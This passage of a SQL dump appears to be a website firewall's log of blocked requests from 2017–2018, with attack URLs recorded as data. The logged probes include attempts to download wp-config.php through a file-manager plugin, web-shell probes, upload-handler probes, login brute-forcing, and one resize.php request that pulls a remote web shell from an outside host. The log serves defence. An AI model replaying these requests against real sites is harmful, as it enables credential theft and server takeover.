02:10:17','94.23.238.185','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(94,'2017-04-17 22:59:14','91.121.171.154','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(95,'2017-04-17 22:59:16','91.121.171.154','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(96,'2017-04-17 23:01:06','91.121.171.154','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(97,'2017-04-17 23:04:27','91.121.171.154','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(98,'2017-04-17 23:04:45','91.121.171.154','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(99,'2017-04-17 23:06:19','91.121.171.154','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(100,'2017-04-20 11:36:46','169.0.111.143','http://www.smithandsmith.co.za/administrator/index.php?option=com_akeeba','adminpw',''),(101,'2017-04-20 17:49:29','46.228.21.134','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(102,'2017-04-22 02:01:27','78.157.60.10','http://www.smithandsmith.co.za/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes','dfishield',''),(103,'2017-04-26 10:24:38','223.26.48.169','http://www.smithandsmith.co.za//uploadify/uploadify.php?folder=/','dfishield',''),(104,'2017-04-30 19:50:37','146.185.223.87','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(105,'2017-05-02 22:38:57','167.114.24.142','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(106,'2017-05-02 22:39:09','167.114.24.142','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(107,'2017-05-12 07:25:20','91.200.14.171','http://smithandsmith.co.za/?gf_page=upload','dfishield',''),(108,'2017-05-12 07:25:22','91.200.14.171','http://smithandsmith.co.za/?gf_page=upload','dfishield',''),(109,'2017-05-15 00:27:22','80.82.28.103','http://smithandsmith.co.za/administrator/index.php','ipwl',''),(110,'2017-05-20 00:46:49','46.119.125.64','http://smithandsmith.co.za/administrator/index.php','ipwl',''),(111,'2017-05-23 12:10:06','169.0.110.242','http://smithandsmith.co.za/administrator/?webspring','ipwl',''),(112,'2017-05-23 12:36:43','169.0.110.242','http://smithandsmith.co.za/administrator/?webspring','ipwl',''),(113,'2017-05-23 12:36:53','169.0.110.242','http://smithandsmith.co.za/administrator/','ipwl',''),(114,'2017-05-23 12:37:14','169.0.110.242','http://smithandsmith.co.za/administrator/?webspring','ipwl',''),(115,'2017-05-23 15:12:37','92.42.115.21','http://smithandsmith.co.za/administrator/index.php','ipwl',''),(116,'2017-05-26 08:52:24','169.1.89.183','http://www.smithandsmith.co.za/administrator/?webspring','ipwl',''),(117,'2017-05-26 08:52:49','169.1.89.183','http://www.smithandsmith.co.za/administrator/','ipwl',''),(118,'2017-05-26 08:53:14','169.1.89.183','http://www.smithandsmith.co.za/administrator/?webspring','ipwl',''),(119,'2017-05-28 11:11:11','158.69.227.25','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(120,'2017-05-28 11:11:20','158.69.227.25','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(121,'2017-05-28 11:17:48','158.69.227.25','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(122,'2017-05-28 11:17:48','158.69.227.25','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(123,'2017-05-29 18:21:40','192.187.108.186','http://smithandsmith.co.za//uploadify/uploadify.php?folder=/','dfishield',''),(124,'2017-05-30 07:03:44','192.187.108.186','http://smithandsmith.co.za//uploadify/uploadify.php?folder=/','dfishield',''),(125,'2017-06-02 06:27:07','46.252.24.65','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(126,'2017-06-02 06:27:24','46.252.24.65','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(127,'2017-06-03 08:01:24','162.214.14.216','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(128,'2017-06-03 08:01:24','162.214.14.216','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(129,'2017-06-03 08:01:38','162.214.14.216','http://www.smithandsmith.co.za//wp-admin/options-link.php?666','wafblacklist',''),(130,'2017-06-03 08:01:39','162.214.14.216','http://www.smithandsmith.co.za//wp-admin/options-link.php?666','wafblacklist',''),(131,'2017-06-03 19:45:51','169.0.59.143','http://www.smithandsmith.co.za/administrator/?webspring','ipwl',''),(132,'2017-06-03 19:46:08','169.0.59.143','http://www.smithandsmith.co.za/administrator/','ipwl',''),(133,'2017-06-05 08:23:04','169.0.59.143','http://smithandsmith.co.za/administrator/index.php?option=com_sppagebuilder','ipwl',''),(134,'2017-06-05 08:23:34','169.0.59.143','http://www.smithandsmith.co.za/administrator/','ipwl',''),(135,'2017-06-05 08:23:53','169.0.59.143','http://smithandsmith.co.za/administrator/?webspring','ipwl',''),(136,'2017-06-11 04:25:35','154.126.79.41','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(137,'2017-06-11 04:27:41','154.126.79.41','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(138,'2017-06-14 12:35:43','154.126.79.41','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(139,'2017-06-14 12:35:52','154.126.79.41','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(140,'2017-06-18 03:51:25','94.23.238.185','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(141,'2017-06-18 03:51:32','94.23.238.185','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(142,'2017-06-23 13:37:46','154.126.79.41','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(143,'2017-06-23 13:37:54','154.126.79.41','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(144,'2017-06-27 04:36:48','154.126.79.41','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(145,'2017-06-27 04:36:55','154.126.79.41','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(146,'2017-06-27 10:21:46','154.126.79.41','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(147,'2017-06-27 10:21:58','154.126.79.41','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(148,'2017-07-03 22:53:50','61.174.212.130','http://www.smithandsmith.co.za/uploadify/uploadify.php?folder=/','dfishield',''),(149,'2017-07-12 13:38:37','107.150.49.58','http://www.smithandsmith.co.za/uploadify/uploadify.php?folder=/','dfishield',''),(150,'2017-07-17 11:55:24','74.91.20.146','http://smithandsmith.co.za/uploadify/uploadify.php?folder=/','dfishield',''),(151,'2017-07-23 10:05:12','185.81.157.178','http://www.smithandsmith.co.za//uploadify/uploadify.php?folder=/','dfishield',''),(152,'2017-08-02 11:18:10','169.1.73.240','http://smithandsmith.co.za/administrator/index.php?option=com_sppagebuilder','adminpw',''),(153,'2017-10-05 13:18:23','37.131.217.188','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(154,'2017-10-29 08:53:33','178.211.173.81','http://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(155,'2017-12-22 13:46:52','178.33.45.73','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(156,'2017-12-29 00:02:21','64.235.35.146','http://www.smithandsmith.co.za/administrator/','adminpw',''),(157,'2018-03-29 22:39:01','159.224.139.35','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(158,'2018-03-29 22:39:02','159.224.139.35','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(159,'2018-04-27 10:29:48','178.132.78.37','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(160,'2018-04-27 10:29:49','178.132.78.37','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(161,'2018-04-27 12:06:41','77.69.203.53','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(162,'2018-04-27 12:06:44','77.69.203.53','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(163,'2018-04-27 12:06:45','77.69.203.53','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(164,'2018-05-03 09:38:43','178.137.90.85','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(165,'2018-05-05 09:55:51','217.17.249.9','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(166,'2018-05-05 09:56:06','217.17.249.9','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(167,'2018-05-05 09:56:06','217.17.249.9','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(168,'2018-05-08 20:49:34','146.185.223.25','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(169,'2018-05-08 23:19:39','146.185.223.221','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(170,'2018-05-17 05:42:56','105.184.113.93','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(171,'2018-05-17 10:40:58','169.0.110.55','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(172,'2018-05-17 23:40:41','95.19.251.17','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(173,'2018-05-18 14:46:09','112.162.86.66','http://smithandsmith.co.za/wp-login.php','404shield',''),(174,'2018-05-19 01:20:58','180.94.42.143','http://smithandsmith.co.za/wp-login.php','404shield',''),(175,'2018-05-19 15:32:29','79.184.205.237','http://smithandsmith.co.za/wp-login.php','404shield',''),(176,'2018-05-23 04:20:28','104.168.151.28','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(177,'2018-05-25 18:53:34','5.188.136.72','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(178,'2018-05-25 18:53:34','5.188.136.72','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(179,'2018-05-25 22:40:20','156.155.1.184','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(180,'2018-05-26 07:44:22','196.192.88.37','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(181,'2018-05-26 08:07:07','196.192.88.37','http://smithandsmith.co.za/wp-login.php','404shield',''),(182,'2018-05-27 01:01:17','86.110.118.66','http://www.smithandsmith.co.za/wp-content/themes/purevision/style.css','404shield',''),(183,'2018-05-27 03:52:54','163.172.255.139','http://smithandsmith.co.za/administrator/','adminpw',''),(184,'2018-05-27 07:02:47','86.110.118.66','http://smithandsmith.co.za/wp-content/themes/purevision/style.css','404shield',''),(185,'2018-05-27 07:30:03','86.110.117.10','http://smithandsmith.co.za/wp-content/themes/satoshi/upload-file.php','404shield',''),(186,'2018-05-29 01:51:22','86.110.118.66','http://www.smithandsmith.co.za/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php','404shield',''),(187,'2018-05-29 07:42:58','86.110.117.10','http://smithandsmith.co.za/wp-content/themes/ut-strange/addpress/css/style.css','404shield',''),(188,'2018-05-30 07:29:41','163.172.255.139','http://smithandsmith.co.za/administrator/','adminpw',''),(189,'2018-05-31 07:57:09','130.0.233.119','http://smithandsmith.co.za/wp-login.php','404shield',''),(190,'2018-05-31 07:57:10','130.0.233.119','http://smithandsmith.co.za/wp-login.php','404shield',''),(191,'2018-05-31 07:57:11','130.0.233.119','http://smithandsmith.co.za/wp-login.php','404shield',''),(192,'2018-05-31 15:03:06','104.168.136.8','http://smithandsmith.co.za//wp-admin/install.php','404shield',''),(193,'2018-05-31 15:34:51','104.168.136.8','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(194,'2018-06-01 09:52:19','141.196.192.57','http://www.smithandsmith.co.za//wp-admin///admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin','404shield',''),(195,'2018-06-01 09:52:22','141.196.192.57','http://www.smithandsmith.co.za///wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.ecobrasil.provisorio.ws/administrator/20171/sym/weba12.php','404shield',''),(196,'2018-06-01 09:54:26','141.196.192.57','http://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=showbiz_ajax_action&client_action=update_plugin','404shield',''),(197,'2018-06-01 09:54:27','141.196.192.57','http://www.smithandsmith.co.za//wp-admin/admin-ajax.php?action=wpsp_upload_attachment','404shield',''),(198,'2018-06-01 09:54:44','141.196.192.57','http://www.smithandsmith.co.za/wp-admin/admin-ajax.php?action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=','404shield',''),(199,'2018-06-02 04:15:37','5.188.136.72','http://smithandsmith.co.za/wp-login.php','404shield',''),(200,'2018-06-02 04:15:37','5.188.136.72','http://smithandsmith.co.za/wp-login.php','404shield',''),(201,'2018-06-02 04:15:39','5.188.136.72','http://smithandsmith.co.za/wp-login.php','404shield',''),(202,'2018-06-02 04:15:39','5.188.136.72','http://smithandsmith.co.za/wp-login.php','404shield',''),(203,'2018-06-02 04:49:09','163.172.255.139','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(204,'2018-06-03 07:07:51','178.137.85.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(205,'2018-06-03 07:07:51','178.137.85.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(206,'2018-06-03 07:07:51','178.137.85.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(207,'2018-06-03 19:11:51','46.119.125.177','http://smithandsmith.co.za/wp-login.php','404shield',''),(208,'2018-06-04 03:02:55','46.119.125.177','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(209,'2018-06-04 11:54:22','86.110.117.10','http://www.smithandsmith.co.za/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php','404shield',''),(210,'2018-06-04 17:56:18','191.54.141.80','http://smithandsmith.co.za/wp-login.php','404shield',''),(211,'2018-06-04 19:18:15','163.172.255.139','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(212,'2018-06-05 06:51:36','197.88.32.158','http://smithandsmith.co.za/wp-login.php','404shield',''),(213,'2018-06-05 12:14:57','130.185.155.61','http://www.smithandsmith.co.za/index.php/component/users/?task=user.register','wafblacklist',''),(214,'2018-06-05 12:14:59','130.185.155.61','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(215,'2018-06-07 03:54:08','86.110.117.10','http://www.smithandsmith.co.za/wp-content/themes/famous/style.css','404shield',''),(216,'2018-06-09 11:54:50','91.247.38.43','http://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(217,'2018-06-13 12:50:15','196.210.182.62','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(218,'2018-06-16 10:02:06','193.106.30.99','http://smithandsmith.co.za/wp-admin/includes/fdsj399jdsf.php','404shield',''),(219,'2018-06-17 17:03:43','185.31.33.179','http://smithandsmith.co.za/wp-login.php','404shield',''),(220,'2018-06-17 18:39:19','105.184.67.95','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(221,'2018-06-20 10:04:24','178.137.85.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(222,'2018-06-20 10:04:24','178.137.85.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(223,'2018-06-20 10:04:25','178.137.85.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(224,'2018-06-21 23:29:34','115.89.123.121','http://smithandsmith.co.za/wp-login.php','404shield',''),(225,'2018-06-21 23:29:34','115.89.123.121','http://smithandsmith.co.za/wp-login.php','404shield',''),(226,'2018-06-21 23:29:36','115.89.123.121','http://smithandsmith.co.za/wp-login.php','404shield',''),(227,'2018-06-21 23:29:36','115.89.123.121','http://smithandsmith.co.za/wp-login.php','404shield',''),(228,'2018-06-25 06:25:40','37.131.102.162','http://smithandsmith.co.za/wp-login.php','404shield',''),(229,'2018-06-26 05:11:23','197.207.200.143','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(230,'2018-06-30 16:18:18','190.74.251.230','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(231,'2018-07-04 07:04:05','115.89.123.121','http://smithandsmith.co.za/wp-login.php','404shield',''),(232,'2018-07-04 07:04:05','115.89.123.121','http://smithandsmith.co.za/wp-login.php','404shield',''),(233,'2018-07-05 23:04:36','201.208.2.229','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(234,'2018-07-06 09:18:51','69.12.66.254','http://www.smithandsmith.co.za/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=3','404shield',''),(235,'2018-07-09 00:52:25','197.229.0.122','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(236,'2018-07-11 07:33:02','36.73.169.85','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(237,'2018-07-12 15:04:35','178.137.85.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(238,'2018-07-12 15:04:36','178.137.85.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(239,'2018-07-12 15:04:36','178.137.85.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(240,'2018-07-13 16:25:00','94.23.196.14','http://www.smithandsmith.co.za//wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=0','404shield',''),(241,'2018-07-13 16:25:03','94.23.196.14','http://www.smithandsmith.co.za//wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=0','404shield',''),(242,'2018-07-14 03:07:38','94.23.196.14','http://smithandsmith.co.za//wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=0','404shield',''),(243,'2018-07-14 03:07:39','94.23.196.14','http://smithandsmith.co.za//wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=0','404shield',''),(244,'2018-07-16 01:30:30','200.104.162.241','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(245,'2018-07-16 01:49:04','188.135.51.209','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(246,'2018-07-16 21:06:20','45.76.58.60','http://www.smithandsmith.co.za/wp-admin/install.php','404shield',''),(247,'2018-07-17 07:12:22','189.155.179.109','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(248,'2018-07-17 10:51:05','45.76.58.60','http://www.smithandsmith.co.za/wp-admin/install.php','404shield',''),(249,'2018-07-18 14:59:47','151.80.178.67','http://smithandsmith.co.za/wp-login.php','404shield',''),(250,'2018-07-18 23:02:33','187.22.242.3','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(251,'2018-07-23 13:51:06','185.7.214.167','http://www.smithandsmith.co.za/wp-admin/setup-config.php','404shield',''),(252,'2018-07-25 19:00:24','143.255.154.106','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(253,'2018-07-27 10:15:41','85.229.250.237','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(254,'2018-07-27 14:10:59','36.81.7.252','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(255,'2018-08-01 03:01:44','197.229.0.237','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(256,'2018-08-01 17:53:18','80.248.73.242','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(257,'2018-08-04 01:05:58','185.7.214.101','http://smithandsmith.co.za//wp-admin/install.php?step=2','404shield',''),(258,'2018-08-08 03:46:10','154.69.20.91','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(259,'2018-08-15 06:23:22','209.90.225.195','http://www.smithandsmith.co.za/wp-content/themes/rayoflight/functions/upload-handler.php','404shield',''),(260,'2018-08-21 12:11:13','209.90.225.197','http://www.smithandsmith.co.za/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox.css','404shield',''),(261,'2018-08-29 20:12:56','212.83.149.171','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(262,'2018-08-29 20:12:58','212.83.149.171','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(263,'2018-08-29 20:13:00','212.83.149.171','http://www.smithandsmith.co.za/administrator/','adminpw',''),(264,'2018-08-30 09:58:44','209.90.225.195','http://www.smithandsmith.co.za/wp-content/plugins/viral-optins/api/uploader/file-uploader.php','404shield',''),(265,'2018-08-30 15:48:23','209.90.225.195','http://smithandsmith.co.za/wp-content/plugins/viral-optins/api/uploader/file-uploader.php','404shield',''),(266,'2018-09-01 23:14:12','209.90.225.195','http://www.smithandsmith.co.za/wp-content/plugins/wp-formgenerator/uploads/php/','404shield',''),(267,'2018-09-02 05:15:26','209.90.225.195','http://smithandsmith.co.za/wp-content/plugins/wp-formgenerator/uploads/php/','404shield',''),(268,'2018-09-03 19:15:23','105.227.138.65','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(269,'2018-09-03 20:44:41','178.89.110.135','http://www.smithandsmith.co.za///wp-admin/install.php','404shield',''),(270,'2018-09-06 07:03:04','192.95.30.29','http://smithandsmith.co.za//administrator/','adminpw',''),(271,'2018-09-06 07:03:04','192.95.30.29','http://smithandsmith.co.za//administrator/','adminpw',''),(272,'2018-09-07 08:16:43','49.149.62.164','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(273,'2018-09-07 18:02:32','178.137.94.57','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(274,'2018-09-07 18:02:33','178.137.94.57','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(275,'2018-09-07 18:02:34','178.137.94.57','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(276,'2018-09-09 16:43:25','92.38.128.76','http://smithandsmith.co.za/wp-login.php','404shield',''),(277,'2018-09-09 18:56:29','133.18.200.97','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(278,'2018-09-11 14:53:38','112.120.124.142','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(279,'2018-09-11 22:30:41','47.52.93.76','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(280,'2018-09-12 05:17:27','209.90.225.227','http://www.smithandsmith.co.za/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','404shield',''),(281,'2018-09-13 17:34:38','41.77.26.29','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(282,'2018-09-13 23:10:13','209.90.225.228','http://www.smithandsmith.co.za/wp-content/plugins/fluid_forms/file-upload/server/php/index.php','404shield',''),(283,'2018-09-14 16:48:30','209.90.225.228','http://smithandsmith.co.za/wp-content/plugins/fluid_forms/file-upload/server/php/index.php','404shield',''),(284,'2018-09-15 06:35:37','118.184.47.13','http://smithandsmith.co.za/wp-login.php','404shield',''),(285,'2018-09-15 06:35:37','118.184.47.13','http://smithandsmith.co.za/wp-login.php','404shield',''),(286,'2018-09-15 06:35:39','118.184.47.13','http://smithandsmith.co.za/wp-login.php','404shield',''),(287,'2018-09-15 06:35:39','118.184.47.13','http://smithandsmith.co.za/wp-login.php','404shield',''),(288,'2018-09-18 09:32:34','198.27.83.216','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(289,'2018-09-18 12:10:36','216.244.65.2','http://www.smithandsmith.co.za/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','404shield',''),(290,'2018-09-18 17:48:32','83.166.240.162','http://smithandsmith.co.za/wp-login.php','404shield',''),(291,'2018-09-19 13:58:14','91.247.38.43','http://smithandsmith.co.za/wp-admin/setup-config.php','404shield',''),(292,'2018-09-26 22:05:32','194.87.239.114','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(293,'2018-09-26 22:05:34','194.87.239.114','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(294,'2018-09-26 22:06:19','216.244.65.3','http://www.smithandsmith.co.za/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','404shield',''),(295,'2018-09-27 02:24:27','197.88.12.91','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(296,'2018-09-27 03:17:07','105.226.136.134','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(297,'2018-09-27 04:25:55','216.244.65.3','http://smithandsmith.co.za/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','404shield',''),(298,'2018-09-27 05:43:17','194.87.239.114','http://smithandsmith.co.za/wp-login.php','404shield',''),(299,'2018-09-27 05:43:19','194.87.239.114','http://smithandsmith.co.za/wp-login.php','404shield',''),(300,'2018-09-27 09:23:02','197.88.12.91','http://smithandsmith.co.za/wp-login.php','404shield',''),(301,'2018-09-27 21:36:29','5.235.44.22','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(302,'2018-09-29 01:46:56','114.43.159.49','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(303,'2018-09-29 01:46:57','114.43.159.49','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(304,'2018-09-29 06:49:49','156.155.6.50','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(305,'2018-09-30 15:40:19','198.27.83.216','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(306,'2018-10-03 17:21:59','196.219.77.51','http://smithandsmith.co.za/wp-login.php','404shield',''),(307,'2018-10-04 07:57:20','31.171.1.46','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(308,'2018-10-04 09:41:16','69.12.66.253','http://smithandsmith.co.za/wp-login.php','404shield',''),(309,'2018-10-05 23:08:56','104.129.18.144','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(310,'2018-10-06 05:28:47','77.249.86.115','http://smithandsmith.co.za/wp-login.php','404shield',''),(311,'2018-10-06 06:48:03','209.90.225.226','http://www.smithandsmith.co.za/wp-content/themes/qualifire/style.css','404shield',''),(312,'2018-10-06 16:11:51','209.90.225.226','http://smithandsmith.co.za/wp-content/themes/qualifire/style.css','404shield',''),(313,'2018-10-08 21:26:49','186.120.170.101','http://smithandsmith.co.za/wp-login.php','404shield',''),(314,'2018-10-10 04:54:52','69.12.66.253','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(315,'2018-10-10 12:13:42','105.226.60.36','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(316,'2018-10-12 12:36:25','169.0.202.82','http://smithandsmith.co.za/wp-login.php','404shield',''),(317,'2018-10-15 04:10:53','36.232.54.197','http://smithandsmith.co.za/wp-login.php','404shield',''),(318,'2018-10-15 14:29:05','37.1.137.99','http://smithandsmith.co.za/wp-login.php','404shield',''),(319,'2018-10-16 11:46:37','176.8.88.28','http://smithandsmith.co.za/wp-login.php','404shield',''),(320,'2018-10-16 11:46:45','176.8.88.28','http://smithandsmith.co.za/wp-login.php','404shield',''),(321,'2018-10-18 14:09:41','37.1.137.99','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(322,'2018-10-18 14:09:44','37.1.137.99','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(323,'2018-10-18 19:00:13','83.166.240.162','http://smithandsmith.co.za/wp-login.php','404shield',''),(324,'2018-10-18 19:00:21','83.166.240.162','http://smithandsmith.co.za/wp-login.php','404shield',''),(325,'2018-10-19 14:27:41','77.243.191.21','http://smithandsmith.co.za/wp-login.php','404shield',''),(326,'2018-10-21 02:34:06','103.213.244.20','http://smithandsmith.co.za/wp-login.php','404shield',''),(327,'2018-10-21 02:34:06','103.213.244.20','http://smithandsmith.co.za/wp-login.php','404shield',''),(328,'2018-10-21 02:34:07','103.213.244.20','http://smithandsmith.co.za/wp-login.php','404shield',''),(329,'2018-10-21 02:34:07','103.213.244.20','http://smithandsmith.co.za/wp-login.php','404shield',''),(330,'2018-10-21 18:07:54','35.242.201.93','http://www.smithandsmith.co.za/administrator/','adminpw',''),(331,'2018-10-21 18:10:05','35.242.201.93','http://www.smithandsmith.co.za/administrator/components/com_rokdownloads/assets/uploadhandler.php','dfishield',''),(332,'2018-10-22 04:03:59','176.8.88.28','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(333,'2018-10-22 04:04:07','176.8.88.28','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(334,'2018-10-23 20:20:39','212.83.165.69','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(335,'2018-10-24 